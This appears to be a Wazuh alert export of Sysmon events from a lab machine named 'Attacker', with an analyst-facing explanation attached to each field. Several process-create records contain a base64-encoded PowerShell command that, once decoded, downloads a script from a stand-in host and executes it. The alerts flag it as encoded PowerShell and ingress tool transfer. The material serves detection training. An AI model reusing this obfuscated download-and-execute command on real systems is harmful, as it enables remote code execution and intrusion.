data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:16.698
ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ProcessId: 13236
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00}
ParentProcessId: 14056
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:16.698 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd19-680a-380b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 53 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534240.1385031 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:17.5585591Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283600 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:17.547
ProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ProcessId: 13236
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_r3nbxliw.do2.ps1
CreationUtcTime: 2025-04-24 22:37:17.547
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:17.547 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_r3nbxliw.do2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:17.547 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 50 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534242.1387800 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:20.0085171Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283657 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:18.706
ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ProcessId: 14648
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00}
ParentProcessId: 13236
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:18.706 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd1c-680a-3d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13236 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 54 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534242.1395871 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:20.2262631Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283660 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:20.190
ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ProcessId: 14648
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mzprdnal.c0e.ps1
CreationUtcTime: 2025-04-24 22:37:20.190
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:20.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14648 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mzprdnal.c0e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:20.190 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 51 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534246.1398640 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:23.7195139Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283756 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:21.851
ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00}
ProcessId: 11516
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00}
ParentProcessId: 14648
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:21.851 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd21-680a-440b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
